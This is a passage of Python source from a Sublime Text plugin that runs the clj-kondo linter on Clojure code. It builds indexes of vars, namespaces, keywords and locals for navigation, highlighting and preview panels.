name = keyword.get("name")
row = keyword.get("row")
kindex_.setdefault((ns, name), []).append(keyword)
return {
"kindex": kindex_,
}
def var_index(
analysis,
vindex=True,
vindex_usages=True,
vrn=True,
vrn_usages=True,
):
# Vars indexed by row.
vrn_ = {}
# Vars indexed by namespace and name.
vindex_ = {}
if vindex or vrn:
for var_definition in analysis.get("var-definitions", []):
if vindex:
ns = var_definition.get("ns")
name = var_definition.get("name")
vindex_.setdefault((ns, name), []).append(var_definition)
if vrn:
name_row = var_definition.get("name-row")
vrn_.setdefault(name_row, []).append(var_definition)
# Var usages indexed by row.
vrn_usages_ = {}
# Var usages indexed by name - var name to a set of var usages.
vindex_usages_ = {}
if vindex_usages or vrn_usages:
for var_usage in analysis.get("var-usages", []):
if vindex_usages:
ns = var_usage.get("to")
name = var_usage.get("name")
vindex_usages_.setdefault((ns, name), []).append(var_usage)
if vrn_usages:
name_row = var_usage.get("name-row")
vrn_usages_.setdefault(name_row, []).append(var_usage)
return {
"vindex": vindex_,
"vrn": vrn_,
"vindex_usages": vindex_usages_,
"vrn_usages": vrn_usages_,
}
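# The same kind of sketch for the var indexes (hypothetical data, same field
# names as read by the function above):
#
#     definition = {"ns": "app.core", "name": "walk", "name-row": 10}
#     usage = {"to": "app.core", "name": "walk", "name-row": 42}
#     var_index({"var-definitions": [definition], "var-usages": [usage]})
#     # => {"vindex": {("app.core", "walk"): [definition]},
#     #     "vrn": {10: [definition]},
#     #     "vindex_usages": {("app.core", "walk"): [usage]},
#     #     "vrn_usages": {42: [usage]}}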
# ---
def file_extension(filename):
if filename:
return pathlib.Path(filename).suffix
def remove_empty_rows(thingies):
"""
For some reason, maybe a clj-kondo bug, a Var usage might have a None row.
This function is suitable for any thingy data - not only Var usages.
"""
    return [thingy_data for thingy_data in thingies if thingy_data["row"] is not None]
def staled_analysis(view):
"""
Returns True if view was modified since last analysis.
"""
return view.change_count() != analysis_view_change_count(view)
def view_navigation(view_state):
return view_state.get("navigation", {})
def set_view_navigation(view_state, navigation):
view_state["navigation"] = navigation
def project_path(window):
return window.extract_variables().get("project_path")
def project_data_classpath(window):
"""
Example:
["clojure", "-Spath"]
"""
if project_data := window.project_data():
return project_data.get("pep", {}).get("classpath")
def project_data_paths(window):
"""
Example:
["src", "test"]
"""
if project_data := window.project_data():
return project_data.get("pep", {}).get("paths")
# ---
# Copied from https://github.com/SublimeText/UnitTesting/blob/master/unittesting/utils/progress_bar.py
class ProgressBar:
def __init__(self, label, width=10):
self.label = label
self.width = width
def start(self):
self.done = False
self.update()
def stop(self):
sublime.status_message("")
self.done = True
def update(self, status=0):
if self.done:
return
status = status % (2 * self.width)
before = min(status, (2 * self.width) - status)
after = self.width - before
sublime.status_message("%s [%s=%s]" % (self.label, " " * before, " " * after))
sublime.set_timeout(lambda: self.update(status + 1), 100)
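# Typical ProgressBar usage (sketch): start it before kicking off long-running
# background work and stop it from the completion callback.
#
#     progress = ProgressBar("Analyzing classpath")
#     progress.start()
#     # ... long-running work on another thread ...
#     progress.stop()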
# Copied from https://github.com/eerohele/Tutkain
def htmlify(text):
if text:
return re.sub(r"\n", "<br/>", inspect.cleandoc(html.escape(text)))
else:
return ""
def thingy_location(thingy_data):
"""
Thingy (data) is one of: Var definition, Var usage, local binding, or local usage.
"""
if thingy_data and (filename := thingy_data.get("filename")):
return {
"filename": filename,
"line": thingy_data.get("name-row") or thingy_data.get("row"),
"column": thingy_data.get("name-col") or thingy_data.get("col"),
}
def with_jar(filename, f):
"""
Open JAR `filename` and call `f` with filename and a file-like object (ZipExtFile).
    The filename passed to `f` points to a temporary copy of the JAR entry.
"""
filename_split = filename.split(":")
filename_jar = filename_split[0]
filename_file = filename_split[1]
with ZipFile(filename_jar) as jar:
with jar.open(filename_file) as jar_file:
tmp_path = pathlib.Path(filename_file)
tmp_file_suffix = "." + tmp_path.name
descriptor, tempath = tempfile.mkstemp(suffix=tmp_file_suffix)
with os.fdopen(descriptor, "w") as file:
file.write(jar_file.read().decode())
f(tempath, jar_file)
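# `with_jar` expects a "<path to jar>:<path inside jar>" filename, the same
# convention checked with `".jar:" in filename` elsewhere in this file.
# Example (paths are hypothetical):
#
#     with_jar("/home/user/.m2/org/clojure/clojure/1.11.1/clojure-1.11.1.jar:clojure/string.clj",
#              lambda tmp_filename, jar_file: print(tmp_filename))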
def getlines(filename, begin, end):
"""
Returns a list of lines read from filename.
`end` is inclusive.
"""
return [linecache.getline(filename, lineno) for lineno in range(begin, end + 1)]
def goto(window, location, flags=sublime.ENCODED_POSITION):
if location:
filename = location["filename"]
line = location["line"]
column = location["column"]
if ".jar:" in filename:
def open_file(filename, file):
view = window.open_file(f"{filename}:{line}:{column}", flags=flags)
view.set_scratch(True)
view.set_read_only(True)
with_jar(filename, open_file)
else:
return window.open_file(f"{filename}:{line}:{column}", flags=flags)
def namespace_quick_panel_item(thingy_data):
namespace_name = thingy_data.get("name", thingy_data.get("to", ""))
namespace_filename = thingy_data.get("filename", "")
return sublime.QuickPanelItem(
namespace_name,
kind=(sublime.KIND_ID_NAMESPACE, "n", ""),
annotation=pathlib.Path(namespace_filename).suffix.replace(".", ""),
)
def var_quick_panel_item(thingy_data):
var_namespace = thingy_data.get("ns", thingy_data.get("to", ""))
var_name = thingy_data.get("name", "")
var_arglist = thingy_data.get("arglist-strs", [])
var_filename = thingy_data.get("filename", "")
trigger = f"{var_namespace}/{var_name}"
if var_arglist:
return sublime.QuickPanelItem(
trigger,
kind=sublime.KIND_FUNCTION,
details=" ".join(var_arglist),
annotation=pathlib.Path(var_filename).suffix.replace(".", ""),
)
else:
return sublime.QuickPanelItem(
trigger,
kind=sublime.KIND_VARIABLE,
annotation=pathlib.Path(var_filename).suffix.replace(".", ""),
)
def thingy_quick_panel_item(thingy_type, thingy_data):
if (
thingy_type == TT_NAMESPACE_DEFINITION
or thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
return namespace_quick_panel_item(thingy_data)
elif thingy_type == TT_VAR_DEFINITION or thingy_type == TT_VAR_USAGE:
return var_quick_panel_item(thingy_data)
def var_goto_items(analysis):
items_ = []
for var_definition in var_definitions(analysis):
var_namespace = var_definition.get("ns", "")
var_name = var_definition.get("name", "")
var_arglist = var_definition.get("arglist-strs", [])
var_filename = var_definition.get("filename", "")
trigger = f"{var_namespace}/{var_name}"
items_.append(
{
"thingy_type": TT_VAR_DEFINITION,
"thingy_data": var_definition,
"quick_panel_item": var_quick_panel_item(var_definition),
}
)
return items_
def keyword_goto_items(analysis):
items_ = []
for keywords_ in analysis_kindex(analysis).values():
for keyword_ in keywords_:
if reg := keyword_.get("reg", None):
keyword_namespace = keyword_.get("ns", "")
keyword_name = keyword_.get("name", "")
keyword_filename = keyword_.get("filename", "")
trigger = ":" + (
f"{keyword_namespace}/{keyword_name}"
if keyword_namespace
else keyword_name
)
items_.append(
{
"thingy_type": TT_KEYWORD,
"thingy_data": keyword_,
"quick_panel_item": sublime.QuickPanelItem(
trigger,
kind=sublime.KIND_KEYWORD,
details=reg,
annotation=pathlib.Path(keyword_filename).suffix.replace(
".", ""
),
),
}
)
return items_
def namespace_goto_items(analysis):
items_ = []
for namespace_definition in namespace_definitions(analysis):
namespace_name = namespace_definition.get("name", "")
namespace_filename = namespace_definition.get("filename", "")
items_.append(
{
"thingy_type": TT_NAMESPACE_DEFINITION,
"thingy_data": namespace_definition,
"quick_panel_item": namespace_quick_panel_item(namespace_definition),
}
)
return items_
def preview_thingy(window, thingy_type, thingy_data):
def peek_params(thingy_type, thingy_data):
ns_ = thingy_data.get("ns", None)
name_ = thingy_data.get("name", None)
text_ = None
syntax_ = None
if thingy_type == TT_KEYWORD:
text_ = f"{ns_}/{name_}" if ns_ else name_
text_ = text_ + "\n\n" + thingy_data.get("reg", "")
elif thingy_type == TT_VAR_DEFINITION:
lineno_begin = thingy_data.get("row", thingy_data.get("name-row"))
lineno_end = thingy_data.get("end-row", thingy_data.get("name-end-row"))
thingy_filename = thingy_data["filename"]
# TODO: Try to use the same syntax as the "origin".
syntax_ = "Clojure.sublime-syntax"
if ".jar:" in thingy_filename:
def read_jar_source(filename, file):
nonlocal text_
text_ = "".join(getlines(filename, lineno_begin, lineno_end))
with_jar(thingy_filename, read_jar_source)
else:
text_ = "".join(getlines(thingy_filename, lineno_begin, lineno_end))
elif thingy_type == TT_NAMESPACE_DEFINITION:
text_ = name_
# Doc (optional)
if doc_ := thingy_data.get("doc"):
text_ = text_ + "\n\n" + re.sub(r"^ +", "", doc_, flags=re.M)
else:
text_ = f"{ns_}/{name_}" if ns_ else name_
return {
"characters": text_,
"syntax": syntax_ or "Packages/Text/Plain text.tmLanguage",
}
params = peek_params(thingy_type, thingy_data)
peek_characters = params["characters"]
peek_syntax = params["syntax"]
output_view_ = output_panel(window)
output_view_.set_read_only(False)
output_view_.assign_syntax(peek_syntax)
output_view_.settings().set("line_numbers", False)
output_view_.settings().set("gutter", False)
output_view_.settings().set("is_widget", True)
output_view_.run_command("select_all")
output_view_.run_command("right_delete")
output_view_.run_command(
"append",
{
"characters": peek_characters,
},
)
output_view_.set_read_only(True)
show_output_panel(window)
def show_goto_thingy_quick_panel(window, items):
def on_done(index):
if index != -1:
thingy_data_ = items[index]["thingy_data"]
location = thingy_location(thingy_data_)
goto(window, location)
quick_panel_items = [item_["quick_panel_item"] for item_ in items]
window.show_quick_panel(
quick_panel_items,
on_done,
)
## ---
def settings():
return sublime.load_settings("Pep.sublime-settings")
def debug():
return settings().get("debug", False)
def automatically_highlight():
return settings().get("automatically_highlight", False)
def annotate_view_analysis():
return settings().get("annotate_view_analysis", False)
def set_view_name(view, name):
if view:
if view.is_loading():
sublime.set_timeout(lambda: set_view_name(view, name), 100)
else:
view.set_name(name)
def view_text(view):
return view.substr(sublime.Region(0, view.size()))
def clj_kondo_path():
# Bundled:
# os.path.join(sublime.packages_path(), "Pep", "bin", "clj-kondo")
#
# TODO: Setting to configure clj-kondo path.
return "clj-kondo"
def project_classpath(window):
"""
Returns the project classpath, or None if a classpath setting does not exist.
It reads a custom "pep classpath" setting in the project file.
Example.sublime-project:
{
...
"pep": {
"classpath": ["clojure", "-Spath"]
}
}
"""
if classpath := project_data_classpath(window):
classpath_completed_process = subprocess.run(
classpath, cwd=project_path(window), text=True, capture_output=True
)
classpath_completed_process.check_returncode()
return classpath_completed_process.stdout
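# Putting the two project settings together, a .sublime-project configured for
# Pep might contain (commands and paths are just the examples from the
# docstrings above):
#
#     {
#         "pep": {
#             "classpath": ["clojure", "-Spath"],
#             "paths": ["src", "test"]
#         }
#     }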
## ---
def analyze_view_clj_kondo(view):
try:
window = view.window()
view_file_name = view.file_name()
project_file_name = window.project_file_name() if window else None
# Setting the working directory is important because of clj-kondo's cache.
cwd = None
if project_file_name:
cwd = os.path.dirname(project_file_name)
elif view_file_name:
cwd = os.path.dirname(view_file_name)
analysis_config = f"""{{:output {{:analysis {{:arglists true :locals true :keywords true}} :format :json :canonical-paths true}} }}"""
# --lint <file>: a file can either be a normal file, directory or classpath.
# In the case of a directory or classpath, only .clj, .cljs and .cljc will be processed.
# Use - as filename for reading from stdin.
# --filename <file>: in case stdin is used for linting, use this to set the reported filename.
analysis_subprocess_args = [
clj_kondo_path(),
"--config",
analysis_config,
"--lint",
"-",
"--filename",
view_file_name or "-",
]
analysis_completed_process = subprocess.run(
analysis_subprocess_args,
cwd=cwd,
text=True,
capture_output=True,
input=view_text(view),
)
return json.loads(analysis_completed_process.stdout)
except:
# Always return a dict, no matter what.
return {}
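# For reference, the subprocess above is roughly equivalent to running
# clj-kondo by hand with the view's text on stdin (config taken from the code
# above, filename hypothetical; "-" means "lint stdin"):
#
#     clj-kondo --config '{:output {:analysis {:arglists true :locals true :keywords true} :format :json :canonical-paths true}}' \
#               --lint - --filename src/app/core.clj < src/app/core.clj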
def analyze_view(view, on_completed=None):
# Change count right before analyzing the view.
# This will be stored in the analysis.
view_change_count = view.change_count()
clj_kondo_data = analyze_view_clj_kondo(view)
analysis = clj_kondo_data.get("analysis", {})
# Keywords indexed by row.
krn = {}
# Keywords indexed by name - tuple of namespace and name.
kindex = {}
for keyword in analysis.get("keywords", []):
ns = keyword.get("ns")
name = keyword.get("name")
row = keyword.get("row")
krn.setdefault(row, []).append(keyword)
kindex.setdefault((ns, name), []).append(keyword)
# Locals indexed by row.
lrn = {}
# Locals indexed by ID.
lindex = {}
for local_binding in analysis.get("locals", []):
id = local_binding.get("id")
row = local_binding.get("row")
lrn.setdefault(row, []).append(local_binding)
lindex[id] = local_binding
# Local usages indexed by ID - local binding ID to a set of local usages.
lindex_usages = {}
# Local usages indexed by row.
lrn_usages = {}
for local_usage in analysis.get("local-usages", []):
id = local_usage.get("id")
name_row = local_usage.get("name-row")
lindex_usages.setdefault(id, []).append(local_usage)
lrn_usages.setdefault(name_row, []).append(local_usage)
view_analysis_ = {
"view_change_count": view_change_count,
"findings": clj_kondo_data.get("findings", {}),
"summary": clj_kondo_data.get("summary", {}),
"kindex": kindex,
"krn": krn,
"lindex": lindex,
"lindex_usages": lindex_usages,
"lrn": lrn,
"lrn_usages": lrn_usages,
}
namespace_index_ = namespace_index(analysis)
var_index_ = var_index(analysis)
set_view_analysis(
view.id(),
{
**namespace_index_,
**var_index_,
**view_analysis_,
},
)
if on_completed:
on_completed(view_analysis_)
return True
def analyze_view_async(view, on_completed=None):
threading.Thread(
target=lambda: analyze_view(view, on_completed=on_completed), daemon=True
).start()
def analyze_classpath(window):
"""
Analyze classpath to create indexes for var and namespace definitions.
"""
is_debug = settings().get("debug", False)
if classpath := project_classpath(window):
print(f"(Pep) Analyzing classpath... (Project: {project_path(window)})")
analysis_config = f"""{{:output {{:analysis {{:arglists true :keywords true}} :format :json :canonical-paths true}} }}"""
analysis_subprocess_args = [
clj_kondo_path(),
"--config",
analysis_config,
"--parallel",
"--lint",
classpath,
]
if is_debug:
print("(Pep) clj-kondo\n", pprint.pformat(analysis_subprocess_args))
analysis_completed_process = subprocess.run(
analysis_subprocess_args,
cwd=project_path(window),
text=True,
capture_output=True,
)
output = None
try:
output = json.loads(analysis_completed_process.stdout)
except:
output = {}
analysis = output.get("analysis", {})
keyword_index_ = keyword_index(analysis)
# There's no need to index namespace usages in the classpath.
namespace_index_ = namespace_index(
analysis,
nindex_usages=False,
nrn=False,
nrn_usages=False,
)
# There's no need to index var usages in the classpath.
var_index_ = var_index(
analysis,
vindex_usages=False,
vrn=False,
vrn_usages=False,
)
set_classpath_analysis(
project_path(window),
{
**keyword_index_,
**namespace_index_,
**var_index_,
},
)
print(
f"(Pep) Classpath analysis is completed (Project: {project_path(window)})"
)
def analyze_classpath_async(window):
threading.Thread(target=lambda: analyze_classpath(window), daemon=True).start()
def analyze_paths(window):
"""
Analyze paths to create indexes for var and namespace definitions, and keywords.
"""
is_debug = settings().get("debug", False)
if paths := project_data_paths(window):
classpath = ":".join(paths)
print(
f"(Pep) Analyzing paths... (Project: {project_path(window)}, Paths {paths})"
)
analysis_config = f"""{{:output {{:analysis {{:arglists true :keywords true}} :format :json :canonical-paths true}} }}"""
analysis_subprocess_args = [
clj_kondo_path(),
"--config",
analysis_config,
"--parallel",
"--lint",
classpath,
]
if is_debug:
print("(Pep) clj-kondo\n", pprint.pformat(analysis_subprocess_args))
analysis_completed_process = subprocess.run(
analysis_subprocess_args,
cwd=project_path(window),
text=True,
capture_output=True,
)
output = None
try:
output = json.loads(analysis_completed_process.stdout)
except:
output = {}
analysis = output.get("analysis", {})
keyword_index_ = keyword_index(analysis)
namespace_index_ = namespace_index(
analysis,
nrn=False,
nrn_usages=False,
)
var_index_ = var_index(
analysis,
vrn=False,
vrn_usages=False,
)
set_paths_analysis(
project_path(window),
{
**keyword_index_,
**namespace_index_,
**var_index_,
},
)
print(
f"(Pep) Paths analysis is completed (Project {project_path(window)}, Paths {paths})"
)
def analyze_paths_async(window):
threading.Thread(target=lambda: analyze_paths(window), daemon=True).start()
## ---
def erase_analysis_regions(view):
view.erase_regions("pg_pep_analysis_error")
view.erase_regions("pg_pep_analysis_warning")
# ---
def keyword_region(view, keyword_usage):
"""
Returns the Region of a keyword_usage.
"""
row_start = keyword_usage["row"]
col_start = keyword_usage["col"]
row_end = keyword_usage["end-row"]
col_end = keyword_usage["end-col"]
start_point = view.text_point(row_start - 1, col_start - 1)
end_point = view.text_point(row_end - 1, col_end - 1)
return sublime.Region(start_point, end_point)
def namespace_region(view, namespace):
"""
Returns a Region of a namespace usage.
"""
row_start = namespace.get("name-row")
col_start = namespace.get("name-col")
row_end = namespace.get("name-end-row")
col_end = namespace.get("name-end-col")
start_point = view.text_point(row_start - 1, col_start - 1)
end_point = view.text_point(row_end - 1, col_end - 1)
return sublime.Region(start_point, end_point)
def namespace_definition_region(view, namespace_definition):
"""
Returns a Region of a namespace definition.
"""
return namespace_region(view, namespace_definition)
def namespace_usage_region(view, namespace_usage):
"""
Returns a Region of a namespace usage.
"""
return namespace_region(view, namespace_usage)
def namespace_usage_alias_region(view, namespace_usage):
"""
Returns a Region of a namespace usage.
"""
if namespace_usage.get("alias"):
row_start = namespace_usage.get("alias-row")
col_start = namespace_usage.get("alias-col")
row_end = namespace_usage.get("alias-end-row")
col_end = namespace_usage.get("alias-end-col")
start_point = view.text_point(row_start - 1, col_start - 1)
end_point = view.text_point(row_end - 1, col_end - 1)
return sublime.Region(start_point, end_point)
def local_usage_region(view, local_usage):
"""
Returns the Region of a local usage.
"""
name_row_start = local_usage["name-row"]
name_col_start = local_usage["name-col"]
name_row_end = local_usage["name-end-row"]
name_col_end = local_usage["name-end-col"]
name_start_point = view.text_point(name_row_start - 1, name_col_start - 1)
name_end_point = view.text_point(name_row_end - 1, name_col_end - 1)
return sublime.Region(name_start_point, name_end_point)
def local_binding_region(view, local_binding):
"""
Returns the Region of a local binding.
"""
row_start = local_binding.get("name-row") or local_binding.get("row")
col_start = local_binding.get("name-col") or local_binding.get("col")
row_end = local_binding.get("name-end-row") or local_binding.get("end-row")
col_end = local_binding.get("name-end-col") or local_binding.get("end-col")
start_point = view.text_point(row_start - 1, col_start - 1)
end_point = view.text_point(row_end - 1, col_end - 1)
return sublime.Region(start_point, end_point)
def var_definition_region(view, var_definition):
"""
Returns the Region of a Var definition.
"""
name_row_start = var_definition["name-row"]
name_col_start = var_definition["name-col"]
name_row_end = var_definition["name-end-row"]
name_col_end = var_definition["name-end-col"]
name_start_point = view.text_point(name_row_start - 1, name_col_start - 1)
name_end_point = view.text_point(name_row_end - 1, name_col_end - 1)
return sublime.Region(name_start_point, name_end_point)
def var_usage_region(view, var_usage):
"""
Returns the Region of a Var usage.
"""
name_row_start = var_usage.get("name-row") or var_usage.get("row")
name_col_start = var_usage.get("name-col") or var_usage.get("col")
name_row_end = var_usage.get("name-end-row") or var_usage.get("end-row")
name_col_end = var_usage.get("name-end-col") or var_usage.get("end-col")
name_start_point = view.text_point(name_row_start - 1, name_col_start - 1)
name_end_point = view.text_point(name_row_end - 1, name_col_end - 1)
return sublime.Region(name_start_point, name_end_point)
def var_usage_namespace_region(view, var_usage):
"""
Returns the namespace Region of var_usage, or None.
For some (odd) reason, a var_usage might not have name row & col.
"""
try:
name_row_start = var_usage["name-row"]
name_col_start = var_usage["name-col"]
name_row_end = var_usage["name-end-row"]
name_col_end = var_usage["name-end-col"]
alias = var_usage.get("alias")
# If a var doesn't have an alias, its name is the region.
# But if a var has an alias, alias is the region.
name_start_point = view.text_point(name_row_start - 1, name_col_start - 1)
name_end_point = (
name_start_point + len(alias)
if alias
else view.text_point(name_row_end - 1, name_col_end - 1)
)
return sublime.Region(name_start_point, name_end_point)
except:
return None
# ---
def keyword_in_region(view, krn, region):
"""
Try to find a keyword in region using the krn index.
"""
region_begin_row, _ = view.rowcol(region.begin())
keywords = krn.get(region_begin_row + 1, [])
for keyword in keywords:
_region = keyword_region(view, keyword)
if _region.contains(region):
return (_region, keyword)
def namespace_definition_in_region(view, nrn, region):
region_begin_row, _ = view.rowcol(region.begin())
for namespace_definition in nrn.get(region_begin_row + 1, []):
_region = namespace_definition_region(view, namespace_definition)
if _region.contains(region):
return (_region, namespace_definition)
def namespace_usage_in_region(view, nrn_usages, region):
region_begin_row, _ = view.rowcol(region.begin())
for namespace_usage in nrn_usages.get(region_begin_row + 1, []):
_region = namespace_usage_region(view, namespace_usage)
if _region.contains(region):
return (_region, namespace_usage)
def namespace_usage_alias_in_region(view, nrn_usages, region):
region_begin_row, _ = view.rowcol(region.begin())
for namespace_usage in nrn_usages.get(region_begin_row + 1, []):
if _region := namespace_usage_alias_region(view, namespace_usage):
if _region.contains(region):
return (_region, namespace_usage)
def local_usage_in_region(view, lrn_usages, region):
"""
Local usage dictionary, or None.
Try to find a local usage in the index (lrn_usages).
"""
region_begin_row, _ = view.rowcol(region.begin())
usages = lrn_usages.get(region_begin_row + 1, [])
for usage in usages:
_region = local_usage_region(view, usage)
if _region.contains(region):
return (_region, usage)
def local_binding_in_region(view, lrn, region):
region_begin_row, _ = view.rowcol(region.begin())
for local_binding in lrn.get(region_begin_row + 1, []):
_region = local_binding_region(view, local_binding)
if _region.contains(region):
return (_region, local_binding)
def var_usage_in_region(view, vrn_usages, region):
region_begin_row, _ = view.rowcol(region.begin())
for var_usage in vrn_usages.get(region_begin_row + 1, []):
_region = var_usage_region(view, var_usage)
if _region.contains(region):
return (_region, var_usage)
def var_definition_in_region(view, vrn, region):
region_begin_row, _ = view.rowcol(region.begin())
for var_definition in vrn.get(region_begin_row + 1, []):
_region = var_definition_region(view, var_definition)
if _region.contains(region):
return (_region, var_definition)
# ---
def thingy_file_extensions(thingy_data):
"""
Returns a set of file extensions in which a thingy might be defined.
    A thingy in a .cljc file might be defined in .clj, .cljs or .cljc.
    A thingy in .clj or .cljs might be defined in .cljc or in a file with the same extension.
"""
if file_extension_ := file_extension(thingy_data.get("filename")):
return (
{".clj", ".cljs", ".cljc"}
if file_extension_ == ".cljc"
else {file_extension_, ".cljc"}
)
else:
return {".clj"}
def thingy_kind(thingy_type, thingy_data):
"""
Mapping of thingy type to kind.
"""
if thingy_type == TT_KEYWORD:
return sublime.KIND_KEYWORD
elif thingy_type == TT_LOCAL_BINDING:
return (sublime.KIND_ID_VARIABLE, "v", "Local binding")
elif thingy_type == TT_LOCAL_USAGE:
return (sublime.KIND_ID_VARIABLE, "v", "Local usage")
elif thingy_type == TT_VAR_DEFINITION:
return (
sublime.KIND_FUNCTION
if thingy_data.get("arglist-strs")
else sublime.KIND_VARIABLE
)
elif thingy_type == TT_VAR_USAGE:
return (
sublime.KIND_FUNCTION
if thingy_data.get("arglist-strs")
else sublime.KIND_VARIABLE
)
elif (
thingy_type == TT_NAMESPACE_DEFINITION
or thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
return (sublime.KIND_ID_NAMESPACE, "n", "Namespace")
else:
return sublime.KIND_AMBIGUOUS
def thingy_sel_region(view):
"""
    The thingy region is nothing special; it's simply the first region in the selection.
Most of the time, the first region is what you're looking for.
"""
return view.sel()[0]
def thingy_in_region(view, analysis, region):
"""
Tuple of type, region and data.
Thingy is not a good name, but what to call something that
can be a local binding, local usage, Var definition, or Var usage?
It's difficult to find a good name for it.
A thingy is a triple:
- Type:
- Local binding
- Local usage
- Var definition
- Var usage
- Namespace definition
- Namespace usage
- Namespace usage alias
- Keywords
- Region for the symbol
- The thingy itself - clj-kondo data.
"""
# 1. Try keywords.
thingy_region, thingy_data = keyword_in_region(
view, analysis.get("krn", {}), region
) or (None, None)
if thingy_data:
return ("keyword", thingy_region, thingy_data)
# 2. Try local usages.
thingy_region, thingy_data = local_usage_in_region(
view, analysis.get("lrn_usages", {}), region
) or (None, None)
if thingy_data:
return ("local_usage", thingy_region, thingy_data)
# 3. Try Var usages.
thingy_region, thingy_data = var_usage_in_region(
view, analysis.get("vrn_usages", {}), region
) or (None, None)
if thingy_data:
return ("var_usage", thingy_region, thingy_data)
# 4. Try local bindings.
thingy_region, thingy_data = local_binding_in_region(
view, analysis.get("lrn", {}), region
) or (None, None)
if thingy_data:
return ("local_binding", thingy_region, thingy_data)
# 5. Try Var definitions.
thingy_region, thingy_data = var_definition_in_region(
view, analysis.get("vrn", {}), region
) or (None, None)
if thingy_data:
return ("var_definition", thingy_region, thingy_data)
# 6. Try namespace usages.
thingy_region, thingy_data = namespace_usage_in_region(
view, analysis.get("nrn_usages", {}), region
) or (None, None)
if thingy_data:
return ("namespace_usage", thingy_region, thingy_data)
# 7. Try namespace usages alias.
thingy_region, thingy_data = namespace_usage_alias_in_region(
view, analysis.get("nrn_usages", {}), region
) or (None, None)
if thingy_data:
return ("namespace_usage_alias", thingy_region, thingy_data)
# 8. Try namespace definitions.
thingy_region, thingy_data = namespace_definition_in_region(
view, analysis.get("nrn", {}), region
) or (None, None)
if thingy_data:
return ("namespace_definition", thingy_region, thingy_data)
# ---
def find_keywords(analysis, keyword):
keyword_qualified_name = (keyword.get("ns"), keyword.get("name"))
return analysis.get("kindex", {}).get(keyword_qualified_name, [])
def find_keyword_usages(analysis, keyword):
keywords = find_keywords(analysis, keyword)
return [keyword for keyword in keywords if not keyword.get("reg")]
def find_local_binding(analysis, local_usage):
return analysis_lindex(analysis).get(local_usage.get("id"))
def find_local_usages(analysis, local_binding_or_usage):
return analysis.get("lindex_usages", {}).get(local_binding_or_usage.get("id"), [])
def find_var_definition(analysis, thingy_data):
"""
Returns a var definition thingy data or None.
"""
ns = thingy_data.get("ns", thingy_data.get("to"))
name = thingy_data.get("name")
vindex = analysis_vindex(analysis)
file_extensions = thingy_file_extensions(thingy_data)
for var_definition in vindex.get((ns, name), []):
definition_file_extension = None
if file_extension_ := file_extension(var_definition.get("filename")):
definition_file_extension = file_extension_
else:
definition_file_extension = ".clj"
if definition_file_extension in file_extensions:
return var_definition
def find_var_usages(analysis, thingy_data):
var_ns = thingy_data.get("ns") or thingy_data.get("to")
var_name = thingy_data.get("name")
return var_usages(analysis, (var_ns, var_name))
def find_namespace_definition(analysis, thingy_data):
"""
Returns a namespace definition thingy data or None.
"""
name = thingy_data.get("name", thingy_data.get("to"))
nindex = analysis_nindex(analysis)
file_extensions = thingy_file_extensions(thingy_data)
for namespace_definition in nindex.get(name, []):
definition_file_extension = None
if file_extension_ := file_extension(namespace_definition.get("filename")):
definition_file_extension = file_extension_
else:
definition_file_extension = ".clj"
if definition_file_extension in file_extensions:
return namespace_definition
def find_namespace_usages(analysis, namespace_definition):
"""
Returns usages of namespace_definition.
"""
name = namespace_definition.get("name")
nindex_usages = analysis_nindex_usages(analysis)
return [
namespace_usage
for namespace_usage in nindex_usages.get(name, [])
if file_extension(namespace_usage.get("filename"))
in thingy_file_extensions(namespace_definition)
]
def find_namespace_usages_with_usage(analysis, namespace_usage):
"""
Returns usages of namespace_usage.
"""
name = namespace_usage.get("to")
return [
usage
for usage in analysis_nindex_usages(analysis).get(name, [])
if file_extension(usage.get("filename"))
in thingy_file_extensions(namespace_usage)
]
def find_namespace_vars_usages(analysis, namespace_usage):
"""
Returns usages of Vars from namespace_usage.
It's useful when you want to see Vars (from namespace_usage) being used in your namespace.
"""
usages = []
for var_qualified_name, var_usages in analysis.get("vindex_usages", {}).items():
namespace, _ = var_qualified_name
if namespace == namespace_usage.get("to"):
usages.extend(var_usages)
return usages
def find_keyword_definition(analysis, keyword):
"""
Returns a keyword which has "definition semantics":
- Clojure Spec
- re-frame
"""
k = (keyword.get("ns"), keyword.get("name"))
for keyword_indexed in analysis_kindex(analysis).get(k, []):
if keyword_indexed.get("reg", None):
return keyword_indexed
# ---
def highlight_regions(view, selection, regions):
if regions:
view.add_regions(
"pg_pep_highligths",
regions,
scope="region.cyanish",
flags=sublime.DRAW_NO_FILL,
)
def find_thingy_regions(view, analysis, thingy):
thingy_type, _, thingy_data = thingy
regions = []
if thingy_type == TT_KEYWORD:
# It's a little more involved if it's a 'keys destructuring'.
        # Key names become locals, so their usages must be highlighted.
if thingy_data.get("keys-destructuring"):
lrn = analysis_lrn(analysis)
region = keyword_region(view, thingy_data)
# We should find a local binding for the keyword because of destructuring.
thingy_region, thingy_data = local_binding_in_region(view, lrn, region) or (
None,
None,
)
thingy = ("local_binding", thingy_region, thingy_data)
# Recursive call to find usages regions.
local_usages_regions = find_thingy_regions(view, analysis, thingy)
if local_usages_regions:
regions.extend(local_usages_regions)
else:
keywords = find_keywords(analysis, thingy_data)
for keyword in keywords:
regions.append(keyword_region(view, keyword))
elif thingy_type == TT_LOCAL_BINDING:
regions.append(local_binding_region(view, thingy_data))
local_usages = find_local_usages(analysis, thingy_data)
for local_usage in local_usages:
regions.append(local_usage_region(view, local_usage))
elif thingy_type == TT_LOCAL_USAGE:
# It's possible to have a local usage without a local binding.
# (It looks like a clj-kondo bug.)
if local_binding := find_local_binding(analysis, thingy_data):
regions.append(local_binding_region(view, local_binding))
local_usages = find_local_usages(analysis, thingy_data)
for local_usage in local_usages:
regions.append(local_usage_region(view, local_usage))
elif thingy_type == TT_VAR_DEFINITION:
regions.append(var_definition_region(view, thingy_data))
var_usages = find_var_usages(analysis, thingy_data)
for var_usage in var_usages:
regions.append(var_usage_region(view, var_usage))
elif thingy_type == TT_VAR_USAGE:
if var_definition := find_var_definition(analysis, thingy_data):
regions.append(var_definition_region(view, var_definition))
var_usages = find_var_usages(analysis, thingy_data)
for var_usage in var_usages:
regions.append(var_usage_region(view, var_usage))
elif thingy_type == TT_NAMESPACE_DEFINITION:
regions.append(namespace_definition_region(view, thingy_data))
elif thingy_type == TT_NAMESPACE_USAGE:
regions.append(namespace_usage_region(view, thingy_data))
var_usages = find_namespace_vars_usages(analysis, thingy_data)
for var_usage in var_usages:
if region := var_usage_namespace_region(view, var_usage):
regions.append(region)
